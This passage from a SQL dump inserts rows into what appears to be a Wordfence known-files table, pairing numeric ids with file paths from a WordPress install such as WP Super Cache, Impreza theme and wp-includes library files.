(3711, 'wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-preload.php'),
(3712, 'wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-test-cache.php'),
(3713, 'wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-update-plugins.php'),
(3714, 'wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-update-settings.php'),
(3715, 'wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-settings-map.php'),
(3716, 'wp-content/plugins/wp-super-cache/rest/load.php'),
(3717, 'wp-content/plugins/wp-super-cache/wp-cache-base.php'),
(3718, 'wp-content/plugins/wp-super-cache/wp-cache-config-sample.php'),
(3719, 'wp-content/plugins/wp-super-cache/wp-cache-phase1.php'),
(3720, 'wp-content/plugins/wp-super-cache/wp-cache-phase2.php'),
(3721, 'wp-content/plugins/wp-super-cache/wp-cache.php'),
(3722, 'wp-content/plugins/wp-super-cache/wp-super-cache.pot'),
(3723, 'wp-content/themes/Impreza/404.php'),
(3724, 'wp-content/themes/Impreza/archive.php'),
(3725, 'wp-content/themes/Impreza/author.php'),
(3726, 'wp-content/themes/Impreza/comments.php'),
(3727, 'wp-content/themes/Impreza/config/assets.php'),
(3728, 'wp-content/themes/Impreza/config/demo-import.php'),
(3729, 'wp-content/themes/Impreza/config/envato.php'),
(3730, 'wp-content/themes/Impreza/config/header.css.php'),
(3731, 'wp-content/themes/Impreza/config/migrations.php'),
(3732, 'wp-content/themes/Impreza/config/style-schemes.php'),
(3733, 'wp-content/themes/Impreza/config/theme-options.css.php'),
(3734, 'wp-content/themes/Impreza/footer.php'),
(3735, 'wp-content/themes/Impreza/forum.php'),
(3736, 'wp-content/themes/Impreza/framework/admin/functions/about.php'),
(3737, 'wp-content/themes/Impreza/framework/admin/functions/addons.php'),
(3738, 'wp-content/themes/Impreza/framework/admin/functions/demo-import.php'),
(3739, 'wp-content/themes/Impreza/framework/admin/functions/functions.php'),
(3740, 'wp-content/themes/Impreza/framework/admin/functions/grid-builder.php'),
(3741, 'wp-content/themes/Impreza/framework/admin/functions/theme-updater.php'),
(3742, 'wp-content/themes/Impreza/framework/admin/functions/updater.php');
INSERT INTO `zdenl_wfknownfilelist` (`id`, `path`) VALUES
(3743, 'wp-content/themes/Impreza/framework/admin/js/grid-builder.js'),
(3744, 'wp-content/themes/Impreza/framework/admin/js/widget_areas.js'),
(3745, 'wp-content/themes/Impreza/framework/config/addons.php'),
(3746, 'wp-content/themes/Impreza/framework/config/assets.php'),
(3747, 'wp-content/themes/Impreza/framework/config/cform.php'),
(3748, 'wp-content/themes/Impreza/framework/config/embeds.php'),
(3749, 'wp-content/themes/Impreza/framework/config/envato.php'),
(3750, 'wp-content/themes/Impreza/framework/config/google-fonts.php'),
(3751, 'wp-content/themes/Impreza/framework/config/grid-settings.php'),
(3752, 'wp-content/themes/Impreza/framework/config/grid-templates.php'),
(3753, 'wp-content/themes/Impreza/framework/config/header-settings.php'),
(3754, 'wp-content/themes/Impreza/framework/config/header-templates.php'),
(3755, 'wp-content/themes/Impreza/framework/config/icon-sets.php'),
(3756, 'wp-content/themes/Impreza/framework/config/mega-menu.php'),
(3757, 'wp-content/themes/Impreza/framework/config/meta-boxes.php'),
(3758, 'wp-content/themes/Impreza/framework/config/migrations.php'),
(3759, 'wp-content/themes/Impreza/framework/config/shortcodes.php'),
(3760, 'wp-content/themes/Impreza/framework/config/sidebars.php'),
(3761, 'wp-content/themes/Impreza/framework/config/social_links.php'),
(3762, 'wp-content/themes/Impreza/framework/config/theme-options.php'),
(3763, 'wp-content/themes/Impreza/framework/config/web-safe-fonts.php'),
(3764, 'wp-content/themes/Impreza/framework/config/widgets.php'),
(3765, 'wp-content/themes/Impreza/framework/framework.php'),
(3766, 'wp-content/themes/Impreza/framework/functions/ajax/cart.php'),
(3767, 'wp-content/themes/Impreza/framework/functions/ajax/cform.php'),
(3768, 'wp-content/themes/Impreza/framework/functions/ajax/grid.php'),
(3769, 'wp-content/themes/Impreza/framework/functions/ajax/grid_builder.php'),
(3770, 'wp-content/themes/Impreza/framework/functions/ajax/user_info.php'),
(3771, 'wp-content/themes/Impreza/framework/functions/breadcrumbs.php'),
(3772, 'wp-content/themes/Impreza/framework/functions/comments.php'),
(3773, 'wp-content/themes/Impreza/framework/functions/debug.php'),
(3774, 'wp-content/themes/Impreza/framework/functions/enqueue.php'),
(3775, 'wp-content/themes/Impreza/framework/functions/header.php'),
(3776, 'wp-content/themes/Impreza/framework/functions/helpers.php'),
(3777, 'wp-content/themes/Impreza/framework/functions/layout.php'),
(3778, 'wp-content/themes/Impreza/framework/functions/menu.php'),
(3779, 'wp-content/themes/Impreza/framework/functions/meta-tags.php'),
(3780, 'wp-content/themes/Impreza/framework/functions/migration.php'),
(3781, 'wp-content/themes/Impreza/framework/functions/post-types.php'),
(3782, 'wp-content/themes/Impreza/framework/functions/post.php'),
(3783, 'wp-content/themes/Impreza/framework/functions/shortcodes.php'),
(3784, 'wp-content/themes/Impreza/framework/functions/theme-options.php'),
(3785, 'wp-content/themes/Impreza/framework/functions/widget_areas.php'),
(3786, 'wp-content/themes/Impreza/framework/functions/widgets.php'),
(3787, 'wp-content/themes/Impreza/framework/js/gmaps.min.js'),
(3788, 'wp-content/themes/Impreza/framework/js/jquery.isotope.js'),
(3789, 'wp-content/themes/Impreza/framework/js/jquery.magnific-popup.js'),
(3790, 'wp-content/themes/Impreza/framework/js/jquery.royalslider.min.js'),
(3791, 'wp-content/themes/Impreza/framework/js/owl.carousel.min.js'),
(3792, 'wp-content/themes/Impreza/framework/js/us.core.js'),
(3793, 'wp-content/themes/Impreza/framework/plugins-support/Ultimate_VC_Addons.php'),
(3794, 'wp-content/themes/Impreza/framework/plugins-support/bbpress.php'),
(3795, 'wp-content/themes/Impreza/framework/plugins-support/codelights.php'),
(3796, 'wp-content/themes/Impreza/framework/plugins-support/gravityforms.php'),
(3797, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/js/us_grid_layout.js'),
(3798, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/js/us_icon.js'),
(3799, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/js_composer.php'),
(3800, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/us_btn.php'),
(3801, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/us_cform.php'),
(3802, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/us_contacts.php'),
(3803, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/us_counter.php'),
(3804, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/us_cta.php'),
(3805, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/us_gallery.php'),
(3806, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/us_gmaps.php'),
(3807, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/us_grid.php'),
(3808, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/us_iconbox.php'),
(3809, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/us_image_slider.php'),
(3810, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/us_logos.php'),
(3811, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/us_message.php'),
(3812, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/us_person.php'),
(3813, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/us_pricing.php'),
(3814, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/us_progbar.php'),
(3815, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/us_scroller.php'),
(3816, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/us_separator.php'),
(3817, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/us_sharing.php'),
(3818, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/us_single_image.php'),
(3819, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/us_social_links.php'),
(3820, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/us_testimonial.php'),
(3821, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/vc_column.php'),
(3822, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/vc_column_inner.php'),
(3823, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/vc_column_text.php'),
(3824, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/vc_custom_heading.php'),
(3825, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/vc_row.php'),
(3826, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/vc_row_inner.php'),
(3827, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/vc_tta_accordion.php'),
(3828, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/vc_tta_section.php'),
(3829, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/vc_tta_tabs.php'),
(3830, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/vc_tta_tour.php'),
(3831, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/vc_video.php'),
(3832, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/vc_wp_custommenu.php'),
(3833, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/templates.php'),
(3834, 'wp-content/themes/Impreza/framework/plugins-support/revslider.php'),
(3835, 'wp-content/themes/Impreza/framework/plugins-support/tablepress.php'),
(3836, 'wp-content/themes/Impreza/framework/plugins-support/the_events_calendar.php'),
(3837, 'wp-content/themes/Impreza/framework/plugins-support/tiny_mce.php'),
(3838, 'wp-content/themes/Impreza/framework/plugins-support/us_header_builder.php'),
(3839, 'wp-content/themes/Impreza/framework/plugins-support/woocommerce/header-shop.php'),
(3840, 'wp-content/themes/Impreza/framework/plugins-support/woocommerce/woocommerce.php'),
(3841, 'wp-content/themes/Impreza/framework/plugins-support/wpml.php'),
(3842, 'wp-content/themes/Impreza/framework/shortcodes/us_btn.php'),
(3843, 'wp-content/themes/Impreza/framework/shortcodes/us_cform.php'),
(3844, 'wp-content/themes/Impreza/framework/shortcodes/us_contacts.php'),
(3845, 'wp-content/themes/Impreza/framework/shortcodes/us_counter.php'),
(3846, 'wp-content/themes/Impreza/framework/shortcodes/us_cta.php'),
(3847, 'wp-content/themes/Impreza/framework/shortcodes/us_gallery.php'),
(3848, 'wp-content/themes/Impreza/framework/shortcodes/us_gmaps.php'),
(3849, 'wp-content/themes/Impreza/framework/shortcodes/us_grid.php'),
(3850, 'wp-content/themes/Impreza/framework/shortcodes/us_iconbox.php'),
(3851, 'wp-content/themes/Impreza/framework/shortcodes/us_image_slider.php'),
(3852, 'wp-content/themes/Impreza/framework/shortcodes/us_logos.php'),
(3853, 'wp-content/themes/Impreza/framework/shortcodes/us_message.php'),
(3854, 'wp-content/themes/Impreza/framework/shortcodes/us_person.php'),
(3855, 'wp-content/themes/Impreza/framework/shortcodes/us_pricing.php'),
(3856, 'wp-content/themes/Impreza/framework/shortcodes/us_progbar.php'),
(3857, 'wp-content/themes/Impreza/framework/shortcodes/us_scroller.php'),
(3858, 'wp-content/themes/Impreza/framework/shortcodes/us_separator.php'),
(3859, 'wp-content/themes/Impreza/framework/shortcodes/us_sharing.php'),
(3860, 'wp-content/themes/Impreza/framework/shortcodes/us_single_image.php'),
(3861, 'wp-content/themes/Impreza/framework/shortcodes/us_social_links.php'),
(3862, 'wp-content/themes/Impreza/framework/shortcodes/us_testimonial.php'),
(3863, 'wp-content/themes/Impreza/framework/shortcodes/us_testimonials.php'),
(3864, 'wp-content/themes/Impreza/framework/shortcodes/vc_column.php'),
(3865, 'wp-content/themes/Impreza/framework/shortcodes/vc_column_text.php'),
(3866, 'wp-content/themes/Impreza/framework/shortcodes/vc_row.php'),
(3867, 'wp-content/themes/Impreza/framework/shortcodes/vc_row_inner.php'),
(3868, 'wp-content/themes/Impreza/framework/shortcodes/vc_tta_section.php'),
(3869, 'wp-content/themes/Impreza/framework/shortcodes/vc_tta_tabs.php'),
(3870, 'wp-content/themes/Impreza/framework/shortcodes/vc_video.php'),
(3871, 'wp-content/themes/Impreza/framework/shortcodes/vc_wp_custommenu.php'),
(3872, 'wp-content/themes/Impreza/framework/templates/404.php'),
(3873, 'wp-content/themes/Impreza/framework/templates/archive.php'),
(3874, 'wp-content/themes/Impreza/framework/templates/author.php'),
(3875, 'wp-content/themes/Impreza/framework/templates/blog/single-post-author.php'),
(3876, 'wp-content/themes/Impreza/framework/templates/blog/single-post-related.php'),
(3877, 'wp-content/themes/Impreza/framework/templates/blog/single-post.php'),
(3878, 'wp-content/themes/Impreza/framework/templates/ebuilder.php'),
(3879, 'wp-content/themes/Impreza/framework/templates/eform.php'),
(3880, 'wp-content/themes/Impreza/framework/templates/elements/additional_menu.php'),
(3881, 'wp-content/themes/Impreza/framework/templates/elements/btn.php'),
(3882, 'wp-content/themes/Impreza/framework/templates/elements/cart.php'),
(3883, 'wp-content/themes/Impreza/framework/templates/elements/dropdown.php'),
(3884, 'wp-content/themes/Impreza/framework/templates/elements/html.php'),
(3885, 'wp-content/themes/Impreza/framework/templates/elements/image.php'),
(3886, 'wp-content/themes/Impreza/framework/templates/elements/menu.php'),
(3887, 'wp-content/themes/Impreza/framework/templates/elements/post_author.php'),
(3888, 'wp-content/themes/Impreza/framework/templates/elements/post_comments.php'),
(3889, 'wp-content/themes/Impreza/framework/templates/elements/post_content.php'),
(3890, 'wp-content/themes/Impreza/framework/templates/elements/post_custom_field.php'),
(3891, 'wp-content/themes/Impreza/framework/templates/elements/post_date.php'),
(3892, 'wp-content/themes/Impreza/framework/templates/elements/post_image.php'),
(3893, 'wp-content/themes/Impreza/framework/templates/elements/post_taxonomy.php'),
(3894, 'wp-content/themes/Impreza/framework/templates/elements/post_title.php'),
(3895, 'wp-content/themes/Impreza/framework/templates/elements/product_field.php'),
(3896, 'wp-content/themes/Impreza/framework/templates/elements/search.php'),
(3897, 'wp-content/themes/Impreza/framework/templates/elements/socials.php'),
(3898, 'wp-content/themes/Impreza/framework/templates/elements/text.php'),
(3899, 'wp-content/themes/Impreza/framework/templates/elist.php'),
(3900, 'wp-content/themes/Impreza/framework/templates/export_import.php'),
(3901, 'wp-content/themes/Impreza/framework/templates/footer.php'),
(3902, 'wp-content/themes/Impreza/framework/templates/form/captcha.php'),
(3903, 'wp-content/themes/Impreza/framework/templates/form/checkbox.php'),
(3904, 'wp-content/themes/Impreza/framework/templates/form/email.php'),
(3905, 'wp-content/themes/Impreza/framework/templates/form/form.php'),
(3906, 'wp-content/themes/Impreza/framework/templates/form/hidden.php'),
(3907, 'wp-content/themes/Impreza/framework/templates/form/info.php'),
(3908, 'wp-content/themes/Impreza/framework/templates/form/password.php'),
(3909, 'wp-content/themes/Impreza/framework/templates/form/submit.php'),
(3910, 'wp-content/themes/Impreza/framework/templates/form/textarea.php'),
(3911, 'wp-content/themes/Impreza/framework/templates/form/textfield.php'),
(3912, 'wp-content/themes/Impreza/framework/templates/forum.php'),
(3913, 'wp-content/themes/Impreza/framework/templates/gtemplates.php'),
(3914, 'wp-content/themes/Impreza/framework/templates/header.php'),
(3915, 'wp-content/themes/Impreza/framework/templates/index.php'),
(3916, 'wp-content/themes/Impreza/framework/templates/l-header.php'),
(3917, 'wp-content/themes/Impreza/framework/templates/page.php'),
(3918, 'wp-content/themes/Impreza/framework/templates/search.php'),
(3919, 'wp-content/themes/Impreza/framework/templates/single-us_portfolio.php'),
(3920, 'wp-content/themes/Impreza/framework/templates/single.php'),
(3921, 'wp-content/themes/Impreza/framework/templates/titlebar.php'),
(3922, 'wp-content/themes/Impreza/framework/templates/us_grid/listing-post.php'),
(3923, 'wp-content/themes/Impreza/framework/templates/us_grid/listing.php'),
(3924, 'wp-content/themes/Impreza/framework/templates/widgets/comments.php'),
(3925, 'wp-content/themes/Impreza/framework/templates/widgets/search.php'),
(3926, 'wp-content/themes/Impreza/framework/vendor/usof/functions/ajax-mega-menu.php'),
(3927, 'wp-content/themes/Impreza/framework/vendor/usof/functions/ajax.php'),
(3928, 'wp-content/themes/Impreza/framework/vendor/usof/functions/interface.php'),
(3929, 'wp-content/themes/Impreza/framework/vendor/usof/functions/mega-menu.php'),
(3930, 'wp-content/themes/Impreza/framework/vendor/usof/functions/meta-box.php'),
(3931, 'wp-content/themes/Impreza/framework/vendor/usof/js/ace/ace.js'),
(3932, 'wp-content/themes/Impreza/framework/vendor/usof/js/ace/ext-searchbox.js'),
(3933, 'wp-content/themes/Impreza/framework/vendor/usof/js/ace/mode-css.js'),
(3934, 'wp-content/themes/Impreza/framework/vendor/usof/js/ace/mode-html.js'),
(3935, 'wp-content/themes/Impreza/framework/vendor/usof/js/ace/theme-usof.js'),
(3936, 'wp-content/themes/Impreza/framework/vendor/usof/js/ace/worker-css.js'),
(3937, 'wp-content/themes/Impreza/framework/vendor/usof/js/ace/worker-html.js'),
(3938, 'wp-content/themes/Impreza/framework/vendor/usof/js/colpick.js'),
(3939, 'wp-content/themes/Impreza/framework/vendor/usof/js/select2.min.js'),
(3940, 'wp-content/themes/Impreza/framework/vendor/usof/js/usof.js'),
(3941, 'wp-content/themes/Impreza/framework/vendor/usof/templates/field.php'),
(3942, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/backup.php'),
(3943, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/button_preview.php'),
(3944, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/check_table.php'),
(3945, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/checkboxes.php'),
(3946, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/color.php'),
(3947, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/css.php'),
(3948, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/design_options.php'),
(3949, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/font.php'),
(3950, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/grid_builder.php'),
(3951, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/grid_layout_select.php'),
(3952, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/group_param.php'),
(3953, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/heading.php'),
(3954, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/html.php'),
(3955, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/icon.php'),
(3956, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/imgradio.php'),
(3957, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/link.php'),
(3958, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/message.php'),
(3959, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/radio.php'),
(3960, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/reset.php'),
(3961, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/select.php'),
(3962, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/slider.php'),
(3963, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/style_scheme.php'),
(3964, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/switch.php'),
(3965, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/text.php'),
(3966, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/textarea.php'),
(3967, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/transfer.php'),
(3968, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/upload.php'),
(3969, 'wp-content/themes/Impreza/framework/vendor/usof/usof.php'),
(3970, 'wp-content/themes/Impreza/framework/vendor/widget-importer-exporter/import.php'),
(3971, 'wp-content/themes/Impreza/framework/vendor/wordpress-importer/parsers.php'),
(3972, 'wp-content/themes/Impreza/framework/vendor/wordpress-importer/wordpress-importer.php'),
(3973, 'wp-content/themes/Impreza/framework/widgets/us_blog.php'),
(3974, 'wp-content/themes/Impreza/framework/widgets/us_contacts.php'),
(3975, 'wp-content/themes/Impreza/framework/widgets/us_gallery.php'),
(3976, 'wp-content/themes/Impreza/framework/widgets/us_login.php'),
(3977, 'wp-content/themes/Impreza/framework/widgets/us_portfolio.php'),
(3978, 'wp-content/themes/Impreza/framework/widgets/us_socials.php'),
(3979, 'wp-content/themes/Impreza/functions/migrations/us_migration_2_0.php'),
(3980, 'wp-content/themes/Impreza/functions/migrations/us_migration_2_2.php'),
(3981, 'wp-content/themes/Impreza/functions/migrations/us_migration_2_3.php'),
(3982, 'wp-content/themes/Impreza/functions/migrations/us_migration_2_7.php'),
(3983, 'wp-content/themes/Impreza/functions/migrations/us_migration_2_8.php'),
(3984, 'wp-content/themes/Impreza/functions/migrations/us_migration_3_0.php'),
(3985, 'wp-content/themes/Impreza/functions/migrations/us_migration_3_1.php'),
(3986, 'wp-content/themes/Impreza/functions/migrations/us_migration_3_2.php'),
(3987, 'wp-content/themes/Impreza/functions/migrations/us_migration_3_3.php'),
(3988, 'wp-content/themes/Impreza/functions/migrations/us_migration_3_4.php'),
(3989, 'wp-content/themes/Impreza/functions/migrations/us_migration_3_7.php'),
(3990, 'wp-content/themes/Impreza/functions/migrations/us_migration_3_8.php'),
(3991, 'wp-content/themes/Impreza/functions/migrations/us_migration_3_8_2.php'),
(3992, 'wp-content/themes/Impreza/functions/migrations/us_migration_3_9.php'),
(3993, 'wp-content/themes/Impreza/functions/migrations/us_migration_4_0.php'),
(3994, 'wp-content/themes/Impreza/functions/migrations/us_migration_4_10.php'),
(3995, 'wp-content/themes/Impreza/functions/migrations/us_migration_4_1_2.php'),
(3996, 'wp-content/themes/Impreza/functions/migrations/us_migration_4_2.php'),
(3997, 'wp-content/themes/Impreza/functions/migrations/us_migration_4_3.php'),
(3998, 'wp-content/themes/Impreza/functions/migrations/us_migration_4_4.php'),
(3999, 'wp-content/themes/Impreza/functions/migrations/us_migration_4_4_1.php'),
(4000, 'wp-content/themes/Impreza/functions/migrations/us_migration_4_5.php'),
(4001, 'wp-content/themes/Impreza/functions/migrations/us_migration_4_6.php'),
(4002, 'wp-content/themes/Impreza/functions/migrations/us_migration_4_7.php'),
(4003, 'wp-content/themes/Impreza/functions/migrations/us_migration_4_8.php'),
(4004, 'wp-content/themes/Impreza/functions/migrations/us_migration_4_9.php'),
(4005, 'wp-content/themes/Impreza/functions/migrations/us_migration_4_9_1.php'),
(4006, 'wp-content/themes/Impreza/functions/migrations/us_migration_5_0.php'),
(4007, 'wp-content/themes/Impreza/functions/migrations/us_migration_5_1.php'),
(4008, 'wp-content/themes/Impreza/functions/migrations/us_migration_5_2.php'),
(4009, 'wp-content/themes/Impreza/functions.php'),
(4010, 'wp-content/themes/Impreza/header-shop.php'),
(4011, 'wp-content/themes/Impreza/header.php'),
(4012, 'wp-content/themes/Impreza/index.php'),
(4013, 'wp-content/themes/Impreza/js/theme.js'),
(4014, 'wp-content/themes/Impreza/js/us.core.min.js'),
(4015, 'wp-content/themes/Impreza/page.php'),
(4016, 'wp-content/themes/Impreza/search.php'),
(4017, 'wp-content/themes/Impreza/searchform.php'),
(4018, 'wp-content/themes/Impreza/single-us_portfolio.php'),
(4019, 'wp-content/themes/Impreza/single.php'),
(4020, 'wp-content/themes/Impreza-child/functions.php'),
(4021, 'wp-content/themes/index.php'),
(4022, 'wp-content/uploads/smile_fonts/Defaults/Defaults.svg'),
(4023, 'wp-content/uploads/smile_fonts/Defaults/charmap.php'),
(4024, 'wp-content/uploads/smile_fonts/Defaults/index.php'),
(4025, 'wp-content/uploads/smile_fonts/Defaults/ult-vid-cntrl.svg'),
(4026, 'wp-content/wflogs/attack-data.php'),
(4027, 'wp-content/wflogs/config-livewaf.php'),
(4028, 'wp-content/wflogs/config-synced.php'),
(4029, 'wp-content/wflogs/config-transient.php'),
(4030, 'wp-content/wflogs/config.php'),
(4031, 'wp-content/wflogs/ips.php'),
(4032, 'wp-content/wflogs/rules.php'),
(4033, 'wp-content/wflogs/template.php'),
(4034, 'wp-content/wp-cache-config.php'),
(4035, 'wp-cron.php'),
(4036, 'wp-includes/ID3/getid3.lib.php'),
(4037, 'wp-includes/ID3/getid3.php'),
(4038, 'wp-includes/ID3/license.commercial.txt'),
(4039, 'wp-includes/ID3/license.txt'),
(4040, 'wp-includes/ID3/module.audio-video.asf.php'),
(4041, 'wp-includes/ID3/module.audio-video.flv.php'),
(4042, 'wp-includes/ID3/module.audio-video.matroska.php'),
(4043, 'wp-includes/ID3/module.audio-video.quicktime.php'),
(4044, 'wp-includes/ID3/module.audio-video.riff.php'),
(4045, 'wp-includes/ID3/module.audio.ac3.php'),
(4046, 'wp-includes/ID3/module.audio.dts.php'),
(4047, 'wp-includes/ID3/module.audio.flac.php'),
(4048, 'wp-includes/ID3/module.audio.mp3.php'),
(4049, 'wp-includes/ID3/module.audio.ogg.php'),
(4050, 'wp-includes/ID3/module.tag.apetag.php'),
(4051, 'wp-includes/ID3/module.tag.id3v1.php'),
(4052, 'wp-includes/ID3/module.tag.id3v2.php'),
(4053, 'wp-includes/ID3/module.tag.lyrics3.php'),
(4054, 'wp-includes/ID3/readme.txt'),
(4055, 'wp-includes/IXR/class-IXR-base64.php'),
(4056, 'wp-includes/IXR/class-IXR-client.php'),
(4057, 'wp-includes/IXR/class-IXR-clientmulticall.php'),
(4058, 'wp-includes/IXR/class-IXR-date.php'),
(4059, 'wp-includes/IXR/class-IXR-error.php'),
(4060, 'wp-includes/IXR/class-IXR-introspectionserver.php'),
(4061, 'wp-includes/IXR/class-IXR-message.php'),
(4062, 'wp-includes/IXR/class-IXR-request.php'),
(4063, 'wp-includes/IXR/class-IXR-server.php'),
(4064, 'wp-includes/IXR/class-IXR-value.php'),
(4065, 'wp-includes/Requests/Auth/Basic.php'),
(4066, 'wp-includes/Requests/Auth.php'),
(4067, 'wp-includes/Requests/Cookie/Jar.php'),
(4068, 'wp-includes/Requests/Cookie.php'),
(4069, 'wp-includes/Requests/Exception/HTTP/304.php'),
(4070, 'wp-includes/Requests/Exception/HTTP/305.php'),
(4071, 'wp-includes/Requests/Exception/HTTP/306.php'),
(4072, 'wp-includes/Requests/Exception/HTTP/400.php'),
(4073, 'wp-includes/Requests/Exception/HTTP/401.php'),
(4074, 'wp-includes/Requests/Exception/HTTP/402.php'),
(4075, 'wp-includes/Requests/Exception/HTTP/403.php'),
(4076, 'wp-includes/Requests/Exception/HTTP/404.php'),
(4077, 'wp-includes/Requests/Exception/HTTP/405.php'),
(4078, 'wp-includes/Requests/Exception/HTTP/406.php'),
(4079, 'wp-includes/Requests/Exception/HTTP/407.php'),
(4080, 'wp-includes/Requests/Exception/HTTP/408.php'),
(4081, 'wp-includes/Requests/Exception/HTTP/409.php'),
(4082, 'wp-includes/Requests/Exception/HTTP/410.php'),
(4083, 'wp-includes/Requests/Exception/HTTP/411.php'),
(4084, 'wp-includes/Requests/Exception/HTTP/412.php'),
(4085, 'wp-includes/Requests/Exception/HTTP/413.php'),
(4086, 'wp-includes/Requests/Exception/HTTP/414.php'),
(4087, 'wp-includes/Requests/Exception/HTTP/415.php'),
(4088, 'wp-includes/Requests/Exception/HTTP/416.php'),
(4089, 'wp-includes/Requests/Exception/HTTP/417.php'),
(4090, 'wp-includes/Requests/Exception/HTTP/418.php'),
(4091, 'wp-includes/Requests/Exception/HTTP/428.php'),
(4092, 'wp-includes/Requests/Exception/HTTP/429.php'),
(4093, 'wp-includes/Requests/Exception/HTTP/431.php'),
(4094, 'wp-includes/Requests/Exception/HTTP/500.php'),
(4095, 'wp-includes/Requests/Exception/HTTP/501.php'),
(4096, 'wp-includes/Requests/Exception/HTTP/502.php'),
(4097, 'wp-includes/Requests/Exception/HTTP/503.php'),
(4098, 'wp-includes/Requests/Exception/HTTP/504.php'),
(4099, 'wp-includes/Requests/Exception/HTTP/505.php'),
(4100, 'wp-includes/Requests/Exception/HTTP/511.php'),
(4101, 'wp-includes/Requests/Exception/HTTP/Unknown.php'),
(4102, 'wp-includes/Requests/Exception/HTTP.php'),
(4103, 'wp-includes/Requests/Exception/Transport/cURL.php'),
(4104, 'wp-includes/Requests/Exception/Transport.php'),
(4105, 'wp-includes/Requests/Exception.php'),
(4106, 'wp-includes/Requests/Hooker.php'),
(4107, 'wp-includes/Requests/Hooks.php'),
(4108, 'wp-includes/Requests/IDNAEncoder.php'),
(4109, 'wp-includes/Requests/IPv6.php'),
(4110, 'wp-includes/Requests/IRI.php'),
(4111, 'wp-includes/Requests/Proxy/HTTP.php'),
(4112, 'wp-includes/Requests/Proxy.php'),
(4113, 'wp-includes/Requests/Response/Headers.php'),
(4114, 'wp-includes/Requests/Response.php'),
(4115, 'wp-includes/Requests/SSL.php'),
(4116, 'wp-includes/Requests/Session.php'),
(4117, 'wp-includes/Requests/Transport/cURL.php'),
(4118, 'wp-includes/Requests/Transport/fsockopen.php'),
(4119, 'wp-includes/Requests/Transport.php'),
(4120, 'wp-includes/Requests/Utility/CaseInsensitiveDictionary.php'),
(4121, 'wp-includes/Requests/Utility/FilteredIterator.php'),
(4122, 'wp-includes/SimplePie/Author.php'),
(4123, 'wp-includes/SimplePie/Cache/Base.php'),
(4124, 'wp-includes/SimplePie/Cache/DB.php'),
(4125, 'wp-includes/SimplePie/Cache/File.php'),
(4126, 'wp-includes/SimplePie/Cache/Memcache.php'),
(4127, 'wp-includes/SimplePie/Cache/MySQL.php'),
(4128, 'wp-includes/SimplePie/Cache.php'),
(4129, 'wp-includes/SimplePie/Caption.php'),
(4130, 'wp-includes/SimplePie/Category.php'),
(4131, 'wp-includes/SimplePie/Content/Type/Sniffer.php'),
(4132, 'wp-includes/SimplePie/Copyright.php'),
(4133, 'wp-includes/SimplePie/Core.php'),
(4134, 'wp-includes/SimplePie/Credit.php'),
(4135, 'wp-includes/SimplePie/Decode/HTML/Entities.php'),
